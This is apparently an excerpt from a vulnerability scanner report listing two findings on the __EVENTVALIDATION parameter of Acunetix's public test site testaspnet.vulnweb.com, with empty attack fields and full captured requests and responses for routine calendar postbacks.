Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1127 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,127 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8226&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOKT0WtoIHgJTRBYBBgDA7yEHYtoIZGRkzTPH0VnraJNu9nQd8BhhKRsZI%2Fk%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLxnvKmBwK746uPDALtiZ78CwKo4Jb%2FDwKo4Jb%2FDwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc%2BsAwLmnc%2BsAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb%2FQBgLmnb%2FQBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk%2FAvukuT8C%2B6St0gkC%2B6St0gkC%2B6TB9gIC%2B6TB9gIC%2B6T1jQoC%2B6T1jQoC%2B6TpoAMC%2B6TpoAMC%2B6SdxwwC%2B6SdxwwC%2B6TxrAkC%2B6TxrAkC%2B6TlwwIC%2B6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz%2BQ8C3Muz%2BQ82s%2FuFvcZN0tx7laUkQLbopRbsxg%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:18:00 GMT Content-Length: 12462
Response Body - size: 12,462 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOKT0WtoIHgJTRBYBBgDA7yEHYtoIZGRkzTPH0VnraJNu9nQd8BhhKRsZI/k=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLxnvKmBwK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q82s/uFvcZN0tx7laUkQLbopRbsxg==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:White" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1163 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,163 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8551&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBAmiQzYtsIHgJTRBYBBgCAMPppYdsIZGRkguFE6AB%2BzPg1lk57Co5trhG9z1I%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLXrp2YAQK1zpjCCwKqztDzBAL7pP2sCQL7pP2sCQL7pJHDAgL7pJHDAgLcy%2BPoBQLcy%2BPoBQLcy5ePDQLcy5ePDQLcy4uiBgLcy4uiBgLcy7%2F5DwLcy7%2F5DwLcy9OdBwLcy9OdBwLcy8cwAtzLxzAC3Mv71wkC3Mv71wkC3Mvv6gIC3Mvv6gIC3MvD0w8C3MvD0w8C3Mv39ggC3Mv39ggCsdLBnwoCsdLBnwoCsdL1sgMCsdL1sgMCsdLpyQwCsdLpyQwCsdKd7AUCsdKd7AUCsdKxgw0CsdKxgw0CsdKlpgYCsdKlpgYCsdLZ%2Bg8CsdLZ%2Bg8CsdLNkQcCsdLNkQcCsdKh%2BQUCsdKh%2BQUCsdLVnQ0CsdLVnQ0CivmnBQKK%2BacFAor529kJAor529kJAor5z%2FwCAor5z%2FwCAor545MKAor545MKAor5l7YDAor5l7YDAor5i80MAor5i80MAor5v%2BAFAor5v%2BAFAor504QNAor504QNAor5h%2BwLAor5h%2BwLAor5u4MDAor5u4MDAr%2BT58QJAr%2BT58QJAr%2BTm5sBAr%2BTm5sBAr%2BTj74KAr%2BTj74KAr%2BTo9UDAr%2BTo9UDAr%2BT1%2BkMAr%2BT1%2BkMAr%2BTy4wEAr%2BTy4wEAr%2BT%2F6MNAr%2BT%2F6MNAr%2BTk8YGAr%2BTk8YGAr%2BTx68DAr%2BTx68DAr%2BT%2B8IMAr%2BT%2B8IMlYJAbwoxRfK4UDQaUQi6loDVh2s%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:02:14 GMT Content-Length: 12448
Response Body - size: 12,448 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBAmiQzYtsIHgJTRBYBBgCAMPppYdsIZGRkguFE6AB+zPg1lk57Co5trhG9z1I=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLXrp2YAQK1zpjCCwKqztDzBAL7pP2sCQL7pP2sCQL7pJHDAgL7pJHDAgLcy+PoBQLcy+PoBQLcy5ePDQLcy5ePDQLcy4uiBgLcy4uiBgLcy7/5DwLcy7/5DwLcy9OdBwLcy9OdBwLcy8cwAtzLxzAC3Mv71wkC3Mv71wkC3Mvv6gIC3Mvv6gIC3MvD0w8C3MvD0w8C3Mv39ggC3Mv39ggCsdLBnwoCsdLBnwoCsdL1sgMCsdL1sgMCsdLpyQwCsdLpyQwCsdKd7AUCsdKd7AUCsdKxgw0CsdKxgw0CsdKlpgYCsdKlpgYCsdLZ+g8CsdLZ+g8CsdLNkQcCsdLNkQcCsdKh+QUCsdKh+QUCsdLVnQ0CsdLVnQ0CivmnBQKK+acFAor529kJAor529kJAor5z/wCAor5z/wCAor545MKAor545MKAor5l7YDAor5l7YDAor5i80MAor5i80MAor5v+AFAor5v+AFAor504QNAor504QNAor5h+wLAor5h+wLAor5u4MDAor5u4MDAr+T58QJAr+T58QJAr+Tm5sBAr+Tm5sBAr+Tj74KAr+Tj74KAr+To9UDAr+To9UDAr+T1+kMAr+T1+kMAr+Ty4wEAr+Ty4wEAr+T/6MNAr+T/6MNAr+Tk8YGAr+Tk8YGAr+Tx68DAr+Tx68DAr+T+8IMAr+T+8IMlYJAbwoxRfK4UDQaUQi6loDVh2s=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8521')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">June 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8582')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8548')" style="color:Black" title="May 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8549')" style="color:Black" title="May 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8550')" style="color:Black" title="May 30">30</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8551')" style="color:White" title="May 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8552')" style="color:Black" title="June 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8553')" style="color:Black" title="June 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8554')" style="color:Black" title="June 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8555')" style="color:Black" title="June 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8556')" style="color:Black" title="June 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8557')" style="color:Black" title="June 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8558')" style="color:Black" title="June 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8559')" style="color:Black" title="June 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8560')" style="color:Black" title="June 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8561')" style="color:Black" title="June 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8562')" style="color:Black" title="June 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8563')" style="color:Black" title="June 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8564')" style="color:Black" title="June 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8565')" style="color:Black" title="June 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8566')" style="color:Black" title="June 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8567')" style="color:Black" title="June 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8568')" style="color:Black" title="June 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8569')" style="color:Black" title="June 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8570')" style="color:Black" title="June 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8571')" style="color:Black" title="June 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8572')" style="color:Black" title="June 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8573')" style="color:Black" title="June 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8574')" style="color:Black" title="June 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8575')" style="color:Black" title="June 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8576')" style="color:Black" title="June 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8577')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8578')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8579')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8580')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8581')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8582')" style="color:Black" title="July 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8583')" style="color:Black" title="July 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8584')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8585')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8586')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8587')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8588')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8589')" style="color:Black" title="July 08">8</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
